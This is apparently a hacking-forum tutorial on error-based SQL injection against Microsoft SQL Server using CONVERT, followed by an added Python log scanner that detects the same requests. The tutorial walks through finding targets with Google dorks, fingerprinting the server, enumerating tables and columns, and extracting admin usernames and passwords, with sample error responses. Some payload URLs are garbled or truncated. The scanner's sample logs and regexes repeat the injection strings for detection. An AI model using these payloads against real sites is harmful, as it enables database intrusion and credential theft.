- I hope you will enjoy it....
- Let's start...
- There are various types of SQL injection against Microsoft SQL Server, as follows:
- 1)ODBC Error Message Attack with "CONVERT"
- 2)ODBC Error Message Attack with "HAVING" and "GROUP BY"
- 3)MSSQL Injection with UNION Attack
- 4)MSSQL Injection in Web Services (SOAP Injection)
- 5)MSSQL Blind SQL Injection Attack
- I will be explaining the various SQLi methods in my various tuts..
- So for now we will start with the easiest SQLi method, the one using CONVERT.
- STEP 1:
- First we need to find a vulnerable site.
- By adding a single quote ('), a double quote (") or a semicolon (;) to the field under test.
- eg
- IANA — Example domains'
- IANA — Example domains
- The site is vulnerable to SQL injection if the output shows an error like this:
- [HTTP Response]------------------------------------------------------------------------------
- Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
- [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
- character string ''.
- /news.asp, line 52
- [End HTTP Response]-------------------------------------------------------------------------
- The error could also look something like this:
- Microsoft OLE DB Provider for SQL Server error '80040e14 '
- Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
- ..../ main_rub.asp, line 4
- If errors like the above are shown, the site could be vulnerable to SQL injection.
- You can also find vulnerable sites with a Google dork.
- e.g.
- inurl:page.asp?id=
- inurl:index.asp?sid=
- STEP 2:
- Now we have our vulnerable website.
- The CONVERT function converts a value between two data types; when the given data cannot be converted
- to the target type, an error is returned, and that error message carries the value that failed to convert.
- Now we start our assessment by finding the MSSQL version and the DB name.
- IANA — Example domains
- [http response]-------------------------------------
- Microsoft OLE DB Provider for SQL Server error '80040e07'
- Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00
- (Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation
- Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.
- /includes/templates/header.asp, line 21
- -----------------------------------------------------------
- We now know it is Microsoft SQL Server 2005 and the OS is Windows Server 2003 (Build 3790: Service Pack 2).
- Let's enumerate the DB name.
- IANA — Example domains
- [http response]--------------------------------------
- Microsoft OLE DB Provider for SQL Server error '80040e07'
- Conversion failed when converting the nvarchar value 'IPC' to data type int.
- /includes/templates/header.asp, line 21
- ------------------------------------------------------------
- The data base name is IPC.
- IANA — Example domains
- [http response]----------------------------------------
- Microsoft OLE DB Provider for SQL Server error '80040e07'
- Conversion failed when converting the nvarchar value 'ipcdc' to data type int.
- /includes/templates/header.asp, line 21
- -------------------------------------------------------------
- The user operating the database is ipcdc.
- STEP 3:
- NOW LET'S FIND THE TABLES IN THE DATABASE
- IANA — Example domains e_name+from+information_schema.tables))--
- "information_schema.tables" stores information about the tables in the database, and it has a field called "table_name"
- which holds the name of each table. "SELECT TOP 1" returns only the first table in the database, which is why it fits into the error.
- The result of this request is something like this:
- [http response]----------------------------------------
- Microsoft OLE DB Provider for SQL Server error '80040e07'
- Conversion failed when converting the nvarchar value 'siteStatus' to data type int.
- /includes/templates/header.asp, line 21
- -------------------------------------------------------------
- From this error we know the first table is "siteStatus". The next step is to find the second table.
- We only need to append a WHERE clause to the query from the request above.
- IANA — Example domains e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus')))--
- [http response]----------------------------------------
- Microsoft OLE DB Provider for SQL Server error '80040e07'
- Conversion failed when converting the nvarchar value 'headerGraphic' to data type int.
- /includes/templates/header.asp, line 21
- -------------------------------------------------------------
- Second table: 'headerGraphic'
- IANA — Example domains e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus','headerGraphic')))--
- [http response]----------------------------------------
- Microsoft OLE DB Provider for SQL Server error '80040e07'
- Conversion failed when converting the nvarchar value 'admin' to data type int.
- /includes/templates/header.asp, line 21
- -------------------------------------------------------------
- Third table: 'admin'
- In this way you get each table name, one per error.
- IANA — Example domains e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus','headerGraphic','admin') ))--
- If the query returns something like this:
- [http response]----------------------------------------
- ADODB.Field error '800a0bcd'
- Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
- /page.asp, line 22
- -----------------------------------------------------------------
- IT MEANS THE DATABASE CONTAINS ONLY 3 TABLES: 'siteStatus', 'headerGraphic' AND 'admin'.
- STEP 4:
- Now we are all set..... and we will find the columns in the admin table.
- We merely change "information_schema.tables" to "information_schema.columns" and "table_name" to "column_name",
- but we have to add "table_name" to the WHERE clause in order to specify the table we will pull column names from.
- IANA — Example domains mn_name+from+information_schema.columns+where+tabl e_name='admin'))--
- [http response]----------------------------------------
- Microsoft OLE DB Provider for SQL Server error '80040e07'
- Conversion failed when converting the nvarchar value 'username' to data type int.
- /includes/templates/header.asp, line 21
- -------------------------------------------------------------
- IANA — Example domains mn_name+from+information_schema.columns+where+tabl e_name='admin'+and+column_name+not+in+('username') ))--
- The response will be:
- [http response]----------------------------------------
- Microsoft OLE DB Provider for SQL Server error '80040e07'
- Conversion failed when converting the nvarchar value 'passwd' to data type int.
- /includes/templates/header.asp, line 21
- -------------------------------------------------------------
- So the 2nd column is 'passwd'.
- DO THIS THE SAME WAY WE DID THE URL MANIPULATION FOR TABLES....
- DON'T FORGET TO ADD THE WHERE CLAUSE.
- UNTIL YOU GET AN ERROR LIKE THIS:
- [http response]----------------------------------------
- ADODB.Field error '800a0bcd'
- Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
- /page.asp, line 22
- -----------------------------------------------------------------
- STEP 5: RETRIEVING USERNAME AND PASSWORD etc.
- Now let's see what we got from above:
- table_name: 'admin', 'siteStatus' and 'headerGraphic'
- Here we are interested in 'admin'. So we found the columns of 'admin':
- column_name: 'username' and 'passwd'
- LET'S do our work now
- IANA — Example domains name+from+admin))--
- You will get the first username in the error message.
- e.g. sa_admin
- IANA — Example domains wd+from+admin))--
- You will get the password.
- e.g. comic123
- So you own the MSSQL server with
- USERNAME: sa_admin
- PASSWORD: comic123
- [note:
- 1) You can use AND/OR, both work.
- 2) Don't forget the , (comma) after 'int' in convert().
- 3) In the error, the value after the ' (single quote) is your table_name, column_name, etc.
- 4) You can enumerate more usernames and passwords by using the 'not in' clause, as above.]
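The whole STEP 1 to STEP 5 sequence leaves a recognisable trail in the web server log, so here is an added example (not code from the original paste) of a log check that flags it: a quote probe answered with a 500, CONVERT(int, ...) with @@version or db_name(), and the step-by-step NOT IN walk over information_schema. The log lines are constructed and assume the IIS W3C field layout date, time, cs-uri-stem, cs-uri-query, sc-status.

```python
"""Flag the CONVERT()/information_schema request pattern in IIS logs.
Added example, not code from the original paste. Log lines are constructed
and assume the W3C field layout: date time cs-uri-stem cs-uri-query sc-status."""
import re
from urllib.parse import unquote_plus

# Substrings that the requests in STEP 2-5 leave in the query once decoded.
SIGNATURES = {
    "convert_probe": re.compile(r"convert\s*\(\s*int\s*,", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "not_in_walk": re.compile(r"\bnot\s+in\s*\(", re.I),
    "server_fingerprint": re.compile(r"@@version|db_name\s*\(", re.I),
}

def decode_query(raw):
    """Decode '+' and %XX repeatedly so a double-encoded payload still matches."""
    prev, cur = None, raw
    while prev != cur:
        prev, cur = cur, unquote_plus(cur)
    return cur

def scan_line(line):
    """Return a finding dict for a suspicious log line, else None."""
    parts = line.split()
    if len(parts) < 5 or parts[0].startswith("#"):
        return None                      # header/comment or truncated line
    date, time, stem, query, status = parts[:5]
    decoded = decode_query(query)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    # STEP 1 probe: a quote in the parameter answered by a server error.
    if status == "500" and "'" in decoded:
        hits.append("error_on_quote")
    if not hits:
        return None
    return {"time": f"{date} {time}", "uri": stem, "status": int(status), "hits": hits}

def scan_log(lines):
    """Return (findings, walk_count); walk_count = NOT IN enumeration steps seen."""
    findings = [f for f in map(scan_line, lines) if f]
    walk = sum("not_in_walk" in f["hits"] for f in findings)
    return findings, walk

# Constructed sample: a quote probe, a version fingerprint, then a table walk.
SAMPLE_LOG = """#Fields: date time cs-uri-stem cs-uri-query sc-status
2024-01-01 10:00:01 /news.asp id=1 200
2024-01-01 10:00:05 /news.asp id=1%27 500
2024-01-01 10:00:09 /news.asp id=1+and+1=convert(int,@@version)-- 500
2024-01-01 10:00:14 /news.asp id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))-- 500
2024-01-01 10:00:20 /news.asp id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+(%27siteStatus%27)))-- 500""".splitlines()
```

A burst of findings from one client against one URI, with the walk count climbing one per request, is the enumeration loop from STEP 3 and STEP 4; the same check also shows why the ODBC error text should never reach the browser, since every flagged request only works because the 500 page echoes the converted value.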